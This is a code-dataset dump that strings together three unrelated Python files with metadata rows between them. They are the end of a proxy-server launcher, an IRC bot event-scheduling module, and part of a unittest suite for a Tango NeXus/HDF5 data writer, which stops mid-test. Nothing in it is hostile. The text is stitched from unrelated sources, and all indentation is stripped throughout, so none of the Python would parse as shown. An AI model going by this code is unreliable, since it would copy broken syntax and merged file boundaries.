threading.Thread.__init__(self)
self.obj = obj
def run(self):
self.obj.thread_db(self.obj)
def stop(self):
self.obj.thread_db_stop()
def main():
shell.check_python()
if False:
db_transfer.DbTransfer.thread_db()
else:
if get_config().API_INTERFACE == 'mudbjson':
thread = MainThread(db_transfer.MuJsonTransfer)
elif get_config().API_INTERFACE == 'sspanelv2':
thread = MainThread(db_transfer.DbTransfer)
else:
thread = MainThread(db_transfer.Dbv3Transfer)
thread.start()
try:
while thread.is_alive():
time.sleep(10)
except (KeyboardInterrupt, IOError, OSError) as e:
import traceback
traceback.print_exc()
thread.stop()
if __name__ == '__main__':
main()
| apache-2.0 | -303,056,126,023,824,800 | 24.984615 | 85 | 0.718769 | false | 3.324803 | false | false | false |
Heufneutje/PyHeufyBot | heufybot/modules/commands/event.py | 1 | 13414 | from twisted.internet.task import LoopingCall
from twisted.plugin import IPlugin
from heufybot.moduleinterface import IBotModule
from heufybot.modules.commandinterface import BotCommand
from heufybot.utils import isNumber, networkName
from heufybot.utils.timeutils import now, strftimeWithTimezone, timeDeltaString
from zope.interface import implements
from datetime import datetime, timedelta
import re
class EventCommand(BotCommand):
implements(IPlugin, IBotModule)
name = "Event"
def triggers(self):
return ["event", "events", "timetill", "timesince", "dateof", "revent", "subevent", "unsubevent"]
def load(self):
self.help = "Commands: event <yyyy-MM-dd> (<HH:mm>) <event>, events (<days>), timetill <event>, timesince " \
"<event>, dateof <event>, revent <event>, subevent, unsubevent | Add, request or remove an event " \
"or subscribe to them."
self.commandHelp = {
"event": "event <yyyy-MM-dd> (<HH:mm>) <event> | Add an event to the events database.",
"events": "events <days> | Request all events that occur within the given number of days. The default is "
"a week. The maximum is a year.",
"timetill": "timetill <event> | Request the amount of time until a specified event occurs.",
"timesince": "timesince <event> | Request the amount of time since a specified event occurred.",
"dateof": "dateof <event> | Request the date of a specified event.",
"revent": "revent <event> | Remove a specified event that was added by you from the events database.",
"subevent": "subevent | Subscribe to event announcements. PM to subscribe to them in PM. Requires admin "
"permission to subscribe channels.",
"unbsubevent": "unsubevent | Unsubscribe to event announcements. PM to unsubscribe from them in PM. "
"Requires admin permission to unsubscribe channels."
}
if "events" not in self.bot.storage:
self.bot.storage["events"] = {}
self.events = self.bot.storage["events"]
if "event-subs" not in self.bot.storage:
self.bot.storage["event-subs"] = {}
self.subscriptions = self.bot.storage["event-subs"]
self.announcementLoopCall = LoopingCall(self.checkEvents)
self.announcementLoopCall.start(300, now=True) # Announce events every 5 minutes
def checkPermissions(self, server, source, user, command):
if command in ["subevent", "unsubevent"] and source[0] in self.bot.servers[server].supportHelper.chanTypes:
channel = self.bot.servers[server].channels[source]
if channel.userIsChanOp(user):
return True
return not self.bot.moduleHandler.runActionUntilFalse("checkadminpermission", server, source, user,
"event-subscribe")
return True
def execute(self, server, source, command, params, data):
if networkName(self.bot, server) not in self.events:
self.events[networkName(self.bot, server)] = []
if command == "event":
if len(params) == 0:
self.replyPRIVMSG(server, source, "Add what event?")
return
try:
date = datetime.strptime(" ".join(params[0:2]), "%Y-%m-%d %H:%M")
eventOffset = 2
if len(params) < 3:
self.replyPRIVMSG(server, source, "Add what event?")
return
except ValueError:
try:
date = datetime.strptime(params[0], "%Y-%m-%d")
eventOffset = 1
if len(params) < 2:
self.replyPRIVMSG(server, source, "Add what event?")
return
except ValueError:
e = "The date format you specified is invalid. The format is yyyy-MM-dd or yyyy-MM-dd HH:mm."
self.replyPRIVMSG(server, source, e)
return
event = {
"event": " ".join(params[eventOffset:]),
"date": date,
"user": data["user"].nick,
"fired": True if date < now() else False
}
self.events[networkName(self.bot, server)].append(event)
self.bot.storage["events"] = self.events
m = "Event {!r} on date {} was added to the events database!".format(event["event"],
strftimeWithTimezone(date))
self.replyPRIVMSG(server, source, m)
elif command == "timetill":
if len(params) == 0:
self.replyPRIVMSG(server, source, "You didn't specify an event")
return
events = [x for x in self.events[networkName(self.bot, server)] if x["date"] > now()]
events.sort(key=lambda item: item["date"])
for event in events:
if re.search(" ".join(params), event["event"], re.IGNORECASE):
m = "{}'s event {!r} will occur in {}.".format(event["user"], event["event"], timeDeltaString(
event["date"], now()))
self.replyPRIVMSG(server, source, m)
break
else:
m = "No events matching {!r} were found in the events database.".format(" ".join(params))
self.replyPRIVMSG(server, source, m)
elif command == "timesince":
if len(params) == 0:
self.replyPRIVMSG(server, source, "You didn't specify an event")
return
events = [x for x in self.events[networkName(self.bot, server)] if x["date"] < now()]
events.sort(key=lambda item: item["date"], reverse=True)
for event in events:
if re.search(" ".join(params), event["event"], re.IGNORECASE):
m = "{}'s event {!r} occurred {} ago.".format(event["user"], event["event"], timeDeltaString(
now(), event["date"]))
self.replyPRIVMSG(server, source, m)
break
else:
m = "No events matching {!r} were found in the events database.".format(" ".join(params))
self.replyPRIVMSG(server, source, m)
elif command == "dateof":
if len(params) == 0:
self.replyPRIVMSG(server, source, "You didn't specify an event")
return
events = [x for x in self.events[networkName(self.bot, server)] if x["date"] > now()]
events.sort(key=lambda item: item["date"])
for event in events:
if re.search(" ".join(params), event["event"], re.IGNORECASE):
m = "{}'s event {!r} will occur on {}.".format(event["user"], event["event"],
strftimeWithTimezone(event["date"]))
self.replyPRIVMSG(server, source, m)
break
else:
events = [x for x in self.events[networkName(self.bot, server)] if x["date"] < now()]
events.sort(key=lambda item: item["date"], reverse=True)
for event in events:
if re.search(" ".join(params), event["event"], re.IGNORECASE):
m = "{}'s event {!r} occurred on {}.".format(event["user"], event["event"],
strftimeWithTimezone(event["date"]))
self.replyPRIVMSG(server, source, m)
break
else:
m = "No events matching {!r} were found in the events database.".format(" ".join(params))
self.replyPRIVMSG(server, source, m)
elif command == "events":
if len(params) == 0 or not isNumber(params[0]):
days = 7
else:
days = int(params[0]) if int(params[0]) < 365 else 365
events = [x for x in self.events[networkName(self.bot, server)] if x["date"] > now() and x[
"date"] <= now() + timedelta(days)]
dayString = "" if days == 1 else "s"
if len(events) > 0:
events.sort(key=lambda item: item["date"])
eventNames = [x["event"] for x in events]
m = "Events occurring in the next {} day{}: {}.".format(days, dayString, ", ".join(eventNames))
else:
m = "No events are occurring in the next {} day{}.".format(days, dayString)
self.replyPRIVMSG(server, source, m)
elif command == "revent":
if len(params) == 0:
self.replyPRIVMSG(server, source, "You didn't specify an event")
return
events = [x for x in self.events[networkName(self.bot, server)] if x["date"] > now()]
events.sort(key=lambda item: item["date"])
for event in events:
if re.search(" ".join(params), event["event"], re.IGNORECASE):
self.events[networkName(self.bot, server)].remove(event)
self.bot.storage["events"] = self.events
m = "{}'s event {!r} with date {} has been removed from the events database.".format(
event["user"], event["event"], strftimeWithTimezone(event["date"]))
self.replyPRIVMSG(server, source, m)
break
else:
events = [x for x in self.events[networkName(self.bot, server)] if x["date"] < now() and x[
"user"].lower() == data["user"].nick.lower()]
events.sort(key=lambda item: item["date"], reverse=True)
for event in events:
if re.search(" ".join(params), event["event"], re.IGNORECASE):
self.events[networkName(self.bot, server)].remove(event)
self.bot.storage["events"] = self.events
m = "{}'s event {!r} with date {} has been removed from the events database.".format(
event["user"], event["event"], strftimeWithTimezone(event["date"]))
self.replyPRIVMSG(server, source, m)
break
else:
m = "No events matching {!r} by you were found in the events database.".format(" ".join(params))
self.replyPRIVMSG(server, source, m)
elif command == "subevent" or command == "unsubevent":
if networkName(self.bot, server) not in self.subscriptions:
self.subscriptions[networkName(self.bot, server)] = []
src = source if "channel" in data else data["user"].nick
subAction = command == "subevent"
self._handleSubscription(server, src, subAction)
def checkEvents(self):
for network in self.subscriptions:
if network not in self.events:
continue
try:
server = [x for x in self.bot.servers.itervalues() if x.supportHelper.network == network][0].name
except IndexError: # We're not currently connected to this network
continue
sources = [x for x in self.subscriptions[network] if x in self.bot.servers[server].channels or x in
self.bot.servers[server].users]
if len(sources) == 0:
continue # Only fire events if there's a channel or user to fire them at
events = []
for i in range(0, len(self.events[network])):
event = self.events[network][i]
if event["date"] < now() and event["fired"] == False:
events.append(event)
self.events[network][i]["fired"] = True
if len(events) == 0:
continue
self.bot.storage["events"] = self.events
for source in sources:
for event in events:
m = "{}'s event {!r} is happening right now!".format(event["user"], event["event"])
self.replyPRIVMSG(server, source, m)
def _handleSubscription(self, server, source, subAction):
if subAction:
if source not in self.subscriptions[networkName(self.bot, server)]:
self.subscriptions[networkName(self.bot, server)].append(source)
self.bot.storage["event-subs"] = self.subscriptions
m = "{} is now subscribed to event announcements.".format(source)
else:
m = "{} is already subscribed to event announcements!".format(source)
else:
if source in self.subscriptions[networkName(self.bot, server)]:
self.subscriptions[networkName(self.bot, server)].remove(source)
self.bot.storage["event-subs"] = self.subscriptions
m = "{} is now unsubscribed from event announcements.".format(source)
else:
m = "{} is not subscribed to event announcements!".format(source)
self.replyPRIVMSG(server, source, m)
eventCommand = EventCommand()
| mit | 7,352,617,542,097,835,000 | 55.125523 | 120 | 0.537424 | false | 4.43145 | false | false | false |
nexdatas/writer | test/NXSDataWriterH5Cpp_test.py | 1 | 207726 | #!/usr/bin/env python
# This file is part of nexdatas - Tango Server for NeXus data writer
#
# Copyright (C) 2012-2017 DESY, Jan Kotanski <[email protected]>
#
# nexdatas is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# nexdatas is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with nexdatas. If not, see <http://www.gnu.org/licenses/>.
# \package test nexdatas
# \file NXSDataWriterTest.py
# unittests for NXSDataWriter
#
import unittest
import os
import sys
import json
import numpy
import PyTango
try:
from ProxyHelper import ProxyHelper
except Exception:
from .ProxyHelper import ProxyHelper
import struct
from nxstools import h5cppwriter as H5CppWriter
try:
import ServerSetUp
except Exception:
from . import ServerSetUp
# if 64-bit machione
IS64BIT = (struct.calcsize("P") == 8)
# test fixture
class NXSDataWriterH5CppTest(unittest.TestCase):
# server counter
serverCounter = 0
# constructor
# \param methodName name of the test method
def __init__(self, methodName):
unittest.TestCase.__init__(self, methodName)
NXSDataWriterH5CppTest.serverCounter += 1
sins = self.__class__.__name__ + \
"%s" % NXSDataWriterH5CppTest.serverCounter
self._sv = ServerSetUp.ServerSetUp("testp09/testtdw/" + sins, sins)
self.__status = {
PyTango.DevState.OFF: "Not Initialized",
PyTango.DevState.ON: "Ready",
PyTango.DevState.OPEN: "File Open",
PyTango.DevState.EXTRACT: "Entry Open",
PyTango.DevState.RUNNING: "Writing ...",
PyTango.DevState.FAULT: "Error",
}
self._scanXmlb = """
<definition>
<group type="NXentry" name="entry%s">
<group type="NXinstrument" name="instrument">
<attribute name ="short_name"> scan instrument </attribute>
<group type="NXdetector" name="detector">
<field units="m" type="NX_FLOAT" name="counter1">
<strategy mode="STEP"/>
<datasource type="CLIENT">
<record name="exp_c01"/>
</datasource>
</field>
<field units="" type="NX_FLOAT" name="mca">
<dimensions rank="1">
<dim value="2048" index="1"/>
</dimensions>
<strategy mode="STEP"/>
<datasource type="CLIENT">
<record name="p09/mca/exp.02"/>
</datasource>
</field>
</group>
</group>
<group type="NXdata" name="data">
<link target="/NXentry/NXinstrument/NXdetector/mca" name="data">
<doc>
Link to mca in /NXentry/NXinstrument/NXdetector
</doc>
</link>
<link target="%s://entry%s/instrument/detector/counter1" name="cnt1">
<doc>
Link to counter1 in /NXentry/NXinstrument/NXdetector
</doc>
</link>
</group>
</group>
</definition>
"""
self._scanXml = """
<definition>
<group type="NXentry" name="entry1">
<group type="NXinstrument" name="instrument">
<attribute name ="short_name"> scan instrument </attribute>
<group type="NXdetector" name="detector">
<field units="m" type="NX_FLOAT" name="counter1">
<strategy mode="STEP"/>
<datasource type="CLIENT">
<record name="exp_c01"/>
</datasource>
</field>
<field units="" type="NX_FLOAT" name="mca">
<dimensions rank="1">
<dim value="2048" index="1"/>
</dimensions>
<strategy mode="STEP"/>
<datasource type="CLIENT">
<record name="p09/mca/exp.02"/>
</datasource>
</field>
</group>
</group>
<group type="NXdata" name="data">
<link target="%s://entry1/instrument/detector/mca" name="data">
<doc>
Link to mca in /NXentry/NXinstrument/NXdetector
</doc>
</link>
<link target="/NXentry/NXinstrument/NXdetector/counter1" name="counter1">
<doc>
Link to counter1 in /NXentry/NXinstrument/NXdetector
</doc>
</link>
</group>
</group>
</definition>
"""
self._scanXml1 = """
<definition>
<group type="NXentry" name="entry1">
<group type="NXinstrument" name="instrument">
<attribute name ="short_name"> scan instrument </attribute>
<group type="NXdetector" name="detector">
<field units="m" type="NX_FLOAT" name="counter1">
<strategy mode="STEP"/>
<datasource type="CLIENT">
<record name="exp_c01"/>
</datasource>
</field>
<field units="" type="NX_FLOAT" name="mca">
<dimensions rank="1">
<dim value="2048" index="1"/>
</dimensions>
<strategy mode="STEP"/>
<datasource type="CLIENT">
<record name="p09/mca/exp.02"/>
</datasource>
</field>
</group>
</group>
<group type="NXdata" name="data">
<link target="/NXentry/NXinstrument/NXdetector/mca" name="data">
<doc>
Link to mca in /NXentry/NXinstrument/NXdetector
</doc>
</link>
<link target="/entry1/instrument/detector/counter1" name="cnt1">
<doc>
Link to counter1 in /NXentry/NXinstrument/NXdetector
</doc>
</link>
</group>
</group>
</definition>
"""
self._scanXml3 = """
<definition>
<group type="NXentry" name="entry1">
<group type="NXinstrument" name="instrument">
<attribute name ="short_name"> scan instrument </attribute>
<group type="NXdetector" name="detector">
<field units="m" type="NX_FLOAT" name="counter1">
<strategy mode="STEP"/>
<datasource type="CLIENT">
<record name="exp_c01"/>
</datasource>
</field>
<field units="" type="NX_INT64" name="image">
<dimensions rank="2">
<dim value="100" index="1"/>
<dim value="200" index="2"/>
</dimensions>
<strategy mode="STEP"/>
<datasource type="CLIENT">
<record name="image"/>
</datasource>
</field>
</group>
</group>
<group type="NXdata" name="data">
<link target="/NXentry/NXinstrument/NXdetector/image" name="data">
<doc>
Link to mca in /NXentry/NXinstrument/NXdetector
</doc>
</link>
<link target="%s://entry1/instrument/detector/counter1" name="cnt1">
<doc>
Link to counter1 in /NXentry/NXinstrument/NXdetector
</doc>
</link>
</group>
</group>
</definition>
"""
self._counter = [0.1, 0.2]
self._mca1 = [e * 0.1 for e in range(2048)]
self._mca2 = [(float(e) / (100. + e)) for e in range(2048)]
self._image1 = [[(i + j) for i in range(100)] for j in range(200)]
self._image2 = [[(i - j) for i in range(100)] for j in range(200)]
self._image1a = [[(i + j) for i in range(200)] for j in range(100)]
self._image2a = [[(i - j) for i in range(200)] for j in range(100)]
self._bint = "int64" if IS64BIT else "int32"
self._buint = "uint64" if IS64BIT else "uint32"
self._bfloat = "float64" if IS64BIT else "float32"
# test starter
# \brief Common set up of Tango Server
def setUp(self):
self._sv.setUp()
# test closer
# \brief Common tear down oif Tango Server
def tearDown(self):
self._sv.tearDown()
def setProp(self, rc, name, value):
db = PyTango.Database()
name = "" + name[0].upper() + name[1:]
db.put_device_property(
self._sv.new_device_info_writer.name,
{name: value})
rc.Init()
# Exception tester
# \param exception expected exception
# \param method called method
# \param args list with method arguments
# \param kwargs dictionary with method arguments
def myAssertRaise(self, exception, method, *args, **kwargs):
try:
error = False
method(*args, **kwargs)
except Exception:
error = True
self.assertEqual(error, True)
# openFile test
# \brief It tests validation of opening and closing H5 files.
def test_openFile(self):
fun = sys._getframe().f_code.co_name
print("Run: %s.%s() " % (self.__class__.__name__, fun))
try:
fname = '%s/test.h5' % os.getcwd()
dp = PyTango.DeviceProxy(self._sv.device)
self.assertTrue(ProxyHelper.wait(dp, 10000))
# print 'attributes', dp.attribute_list_query()
self.assertEqual(dp.state(), PyTango.DevState.ON)
self.assertEqual(dp.status(), self.__status[dp.state()])
self.setProp(dp, "writer", "h5cpp")
dp.FileName = fname
dp.OpenFile()
self.assertEqual(dp.state(), PyTango.DevState.OPEN)
self.assertEqual(dp.status(), self.__status[dp.state()])
self.assertEqual(dp.XMLSettings, "")
self.assertEqual(dp.JSONRecord, "{}")
dp.CloseFile()
self.assertEqual(dp.state(), PyTango.DevState.ON)
self.assertEqual(dp.status(), self.__status[dp.state()])
# check the created file
f = H5CppWriter.open_file(fname, readonly=True)
# self.assertEqual(f.name, fname)
f = f.root()
# self.assertEqual(f.path, fname)
# print("\nFile attributes:")
cnt = 0
for at in f.attributes:
cnt += 1
# print(at.name),"=",at[...]
self.assertEqual(cnt, len(f.attributes))
self.assertEqual(5, len(f.attributes))
# print ""
self.assertEqual(f.attributes["file_name"][...], fname)
self.assertTrue(f.attributes["NX_class"][...], "NXroot")
self.assertEqual(f.size, 1)
cnt = 0
for ch in f:
cnt += 1
self.assertEqual(cnt, f.size)
f.close()
finally:
if os.path.isfile(fname):
os.remove(fname)
# openFile test
# \brief It tests validation of opening and closing H5 files.
def test_openFileDir(self):
fun = sys._getframe().f_code.co_name
print("Run: %s.%s() " % (self.__class__.__name__, fun))
directory = '#nexdatas_test_directory#'
dirCreated = False
dirExists = False
if not os.path.exists(directory):
try:
os.makedirs(directory)
dirCreated = True
dirExists = True
except Exception:
pass
else:
dirExists = True
if dirExists:
fname = '%s/%s/%s%s.h5' % (
os.getcwd(), directory, self.__class__.__name__, fun)
else:
fname = '%s/%s%s.h5' % (os.getcwd(), self.__class__.__name__, fun)
if dirCreated:
fname = '%s/%s/%s%s.h5' % (
os.getcwd(), directory, self.__class__.__name__, fun)
else:
fname = '%s/%s%s.h5' % (os.getcwd(), self.__class__.__name__, fun)
try:
fname = '%s/test.h5' % os.getcwd()
dp = PyTango.DeviceProxy(self._sv.device)
self.assertTrue(ProxyHelper.wait(dp, 10000))
# print 'attributes', dp.attribute_list_query()
self.assertEqual(dp.state(), PyTango.DevState.ON)
self.assertEqual(dp.status(), self.__status[dp.state()])
self.setProp(dp, "writer", "h5cpp")
dp.FileName = fname
dp.OpenFile()
self.assertEqual(dp.state(), PyTango.DevState.OPEN)
self.assertEqual(dp.status(), self.__status[dp.state()])
self.assertEqual(dp.XMLSettings, "")
self.assertEqual(dp.JSONRecord, "{}")
dp.CloseFile()
self.assertEqual(dp.state(), PyTango.DevState.ON)
self.assertEqual(dp.status(), self.__status[dp.state()])
# check the created file
f = H5CppWriter.open_file(fname, readonly=True)
f = f.root()
# self.assertEqual(f.name, fname)
# self.assertEqual(f.path, fname)
# print("\nFile attributes:")
cnt = 0
for at in f.attributes:
cnt += 1
# print(at.name),"=",at[...]
self.assertEqual(cnt, len(f.attributes))
self.assertEqual(5, len(f.attributes))
# print ""
self.assertEqual(f.attributes["file_name"][...], fname)
self.assertTrue(f.attributes["NX_class"][...], "NXroot")
self.assertEqual(f.size, 1)
cnt = 0
for ch in f:
cnt += 1
self.assertEqual(cnt, f.size)
f.close()
finally:
if os.path.isfile(fname):
os.remove(fname)
if dirCreated:
os.removedirs(directory)
# openEntry test
# \brief It tests validation of opening and closing entry in H5 files.
def test_openEntry(self):
fun = sys._getframe().f_code.co_name
print("Run: %s.%s() " % (self.__class__.__name__, fun))
fname = '%s/test2.h5' % os.getcwd()
xml = '<definition> <group type="NXentry" name="entry"/></definition>'
try:
dp = PyTango.DeviceProxy(self._sv.device)
self.assertTrue(ProxyHelper.wait(dp, 10000))
# print 'attributes', dp.attribute_list_query()
self.setProp(dp, "writer", "h5cpp")
dp.FileName = fname
self.assertEqual(dp.state(), PyTango.DevState.ON)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.OpenFile()
self.assertEqual(dp.state(), PyTango.DevState.OPEN)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.XMLSettings = xml
self.assertEqual(dp.state(), PyTango.DevState.OPEN)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.OpenEntry()
self.assertEqual(dp.status(), self.__status[dp.state()])
self.assertEqual(dp.state(), PyTango.DevState.EXTRACT)
dp.CloseEntry()
self.assertEqual(dp.status(), self.__status[dp.state()])
self.assertEqual(dp.state(), PyTango.DevState.OPEN)
dp.CloseFile()
self.assertEqual(dp.status(), self.__status[dp.state()])
self.assertEqual(dp.state(), PyTango.DevState.ON)
# check the created file
f = H5CppWriter.open_file(fname, readonly=True)
f = f.root()
# self.assertEqual(f.path, fname)
cnt = 0
for at in f.attributes:
cnt += 1
self.assertEqual(cnt, len(f.attributes))
self.assertEqual(f.attributes["file_name"][...], fname)
self.assertTrue(f.attributes["NX_class"][...], "NXroot")
self.assertEqual(f.size, 2)
cnt = 0
for ch in f:
self.assertTrue(ch.is_valid)
cnt += 1
if ch.name == "entry":
self.assertEqual(ch.name, "entry")
self.assertEqual(len(ch.attributes), 1)
for at in ch.attributes:
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
# self.assertEqual(at.dtype,"string")
self.assertEqual(at.name, "NX_class")
self.assertEqual(at[...], "NXentry")
else:
self.assertEqual(ch.name, "nexus_logs")
ch2 = ch.open("configuration")
for c in ch2:
if c.name == "nexus__entry__1_xml":
self.assertEqual(
c.read(),
'<definition> '
'<group type="NXentry" name="entry"/>'
'</definition>')
print(c.read())
else:
self.assertEqual(c.name, "python_version")
self.assertEqual(c.read(), sys.version)
self.assertEqual(len(ch.attributes), 1)
for at in ch.attributes:
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
# self.assertEqual(at.dtype,"string")
self.assertEqual(at.name, "NX_class")
self.assertEqual(at[...], "NXcollection")
self.assertEqual(cnt, f.size)
f.close()
finally:
if os.path.isfile(fname):
os.remove(fname)
# openEntryWithSAXParseException test
# \brief It tests validation of opening and closing entry
# with SAXParseException
def test_openEntryWithSAXParseException(self):
fun = sys._getframe().f_code.co_name
print("Run: %s.%s() " % (self.__class__.__name__, fun))
fname = '%s/test2.h5' % os.getcwd()
wrongXml = """Ala ma kota."""
xml = """<definition/>"""
try:
dp = PyTango.DeviceProxy(self._sv.device)
self.assertTrue(ProxyHelper.wait(dp, 10000))
# print 'attributes', dp.attribute_list_query()
self.setProp(dp, "writer", "h5cpp")
dp.FileName = fname
self.assertEqual(dp.state(), PyTango.DevState.ON)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.OpenFile()
try:
error = None
dp.XMLSettings = wrongXml
except PyTango.DevFailed:
error = True
except Exception:
error = False
self.assertEqual(error, True)
self.assertTrue(error is not None)
self.assertEqual(dp.status(), self.__status[dp.state()])
self.assertEqual(dp.state(), PyTango.DevState.OPEN)
# dp.CloseFile()
# dp.OpenFile()
self.assertEqual(dp.state(), PyTango.DevState.OPEN)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.XMLSettings = xml
self.assertEqual(dp.state(), PyTango.DevState.OPEN)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.OpenEntry()
self.assertEqual(dp.state(), PyTango.DevState.EXTRACT)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.CloseEntry()
self.assertEqual(dp.state(), PyTango.DevState.OPEN)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.CloseFile()
self.assertEqual(dp.state(), PyTango.DevState.ON)
self.assertEqual(dp.status(), self.__status[dp.state()])
# check the created file
f = H5CppWriter.open_file(fname, readonly=True)
f = f.root()
# self.assertEqual(f.path, fname)
cnt = 0
for at in f.attributes:
cnt += 1
self.assertEqual(cnt, len(f.attributes))
self.assertEqual(f.attributes["file_name"][...], fname)
self.assertTrue(f.attributes["NX_class"][...], "NXroot")
self.assertEqual(f.size, 1)
cnt = 0
for ch in f:
cnt += 1
self.assertEqual(cnt, f.size)
f.close()
finally:
if os.path.isfile(fname):
os.remove(fname)
# scanRecord test
# \brief It tests recording of simple h5 file
def test_scanRecord_twoentries(self):
fun = sys._getframe().f_code.co_name
print("Run: %s.%s() " % (self.__class__.__name__, fun))
fname = '%s/scantest2.h5' % os.getcwd()
try:
dp = PyTango.DeviceProxy(self._sv.device)
self.assertTrue(ProxyHelper.wait(dp, 10000))
# print 'attributes', dp.attribute_list_query()
self.setProp(dp, "writer", "h5cpp")
dp.FileName = fname
self.assertEqual(dp.stepsperfile, 0)
self.assertEqual(dp.currentfileid, 0)
self.assertEqual(dp.state(), PyTango.DevState.ON)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.OpenFile()
self.assertEqual(dp.stepsperfile, 0)
self.assertEqual(dp.currentfileid, 0)
self.assertEqual(dp.state(), PyTango.DevState.OPEN)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.XMLSettings = self._scanXmlb % ("001", fname, "001")
self.assertEqual(dp.state(), PyTango.DevState.OPEN)
self.assertEqual(dp.status(), self.__status[dp.state()])
self.assertEqual(dp.stepsperfile, 0)
self.assertEqual(dp.currentfileid, 0)
dp.OpenEntry()
self.assertEqual(dp.stepsperfile, 0)
self.assertEqual(dp.currentfileid, 0)
self.assertEqual(dp.state(), PyTango.DevState.EXTRACT)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.Record('{"data": {"exp_c01":' + str(self._counter[0]) +
', "p09/mca/exp.02":' +
str(self._mca1) + ' } }')
self.assertEqual(dp.stepsperfile, 0)
self.assertEqual(dp.currentfileid, 0)
self.assertEqual(dp.state(), PyTango.DevState.EXTRACT)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.Record('{"data": {"exp_c01":' + str(self._counter[1]) +
', "p09/mca/exp.02":' +
str(self._mca2) + ' } }')
self.assertEqual(dp.stepsperfile, 0)
self.assertEqual(dp.currentfileid, 0)
self.assertEqual(dp.state(), PyTango.DevState.EXTRACT)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.CloseEntry()
self.assertEqual(dp.stepsperfile, 0)
self.assertEqual(dp.currentfileid, 0)
self.assertEqual(dp.state(), PyTango.DevState.OPEN)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.XMLSettings = self._scanXmlb % ("002", fname, "002")
self.assertEqual(dp.state(), PyTango.DevState.OPEN)
self.assertEqual(dp.status(), self.__status[dp.state()])
self.assertEqual(dp.stepsperfile, 0)
self.assertEqual(dp.currentfileid, 0)
dp.OpenEntry()
self.assertEqual(dp.stepsperfile, 0)
self.assertEqual(dp.currentfileid, 0)
self.assertEqual(dp.state(), PyTango.DevState.EXTRACT)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.Record('{"data": {"exp_c01":' + str(self._counter[0]) +
', "p09/mca/exp.02":' +
str(self._mca1) + ' } }')
self.assertEqual(dp.stepsperfile, 0)
self.assertEqual(dp.currentfileid, 0)
self.assertEqual(dp.state(), PyTango.DevState.EXTRACT)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.Record('{"data": {"exp_c01":' + str(self._counter[1]) +
', "p09/mca/exp.02":' +
str(self._mca2) + ' } }')
self.assertEqual(dp.stepsperfile, 0)
self.assertEqual(dp.currentfileid, 0)
self.assertEqual(dp.state(), PyTango.DevState.EXTRACT)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.CloseEntry()
self.assertEqual(dp.stepsperfile, 0)
self.assertEqual(dp.currentfileid, 0)
self.assertEqual(dp.state(), PyTango.DevState.OPEN)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.CloseFile()
self.assertEqual(dp.stepsperfile, 0)
self.assertEqual(dp.currentfileid, 0)
self.assertEqual(dp.state(), PyTango.DevState.ON)
self.assertEqual(dp.status(), self.__status[dp.state()])
# check the created file
from nxstools import filewriter as FileWriter
FileWriter.writer = H5CppWriter
f = FileWriter.open_file(fname, readonly=True)
f = f.root()
self.assertEqual(5, len(f.attributes))
self.assertEqual(f.attributes["file_name"][...], fname)
self.assertTrue(f.attributes["NX_class"][...], "NXroot")
self.assertEqual(f.size, 3)
ent = ["001", "002"]
for et in ent:
en = f.open("entry%s" % et)
self.assertTrue(en.is_valid)
self.assertEqual(en.name, "entry%s" % et)
self.assertEqual(len(en.attributes), 1)
self.assertEqual(en.size, 2)
at = en.attributes["NX_class"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "NX_class")
self.assertEqual(at[...], "NXentry")
# ins = f.open("entry1/instrument:NXinstrument") #bad exception
# ins = f.open("entry1/instrument")
ins = en.open("instrument")
self.assertTrue(ins.is_valid)
self.assertEqual(ins.name, "instrument")
self.assertEqual(len(ins.attributes), 2)
self.assertEqual(ins.size, 1)
at = ins.attributes["NX_class"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "NX_class")
self.assertEqual(at[...], "NXinstrument")
at = ins.attributes["short_name"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "short_name")
self.assertEqual(at[...], "scan instrument")
det = ins.open("detector")
self.assertTrue(det.is_valid)
self.assertEqual(det.name, "detector")
self.assertEqual(len(det.attributes), 1)
self.assertEqual(det.size, 2)
at = det.attributes["NX_class"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "NX_class")
self.assertEqual(at[...], "NXdetector")
# cnt = det.open("counter") # bad exception
cnt = det.open("counter1")
self.assertTrue(cnt.is_valid)
self.assertEqual(cnt.name, "counter1")
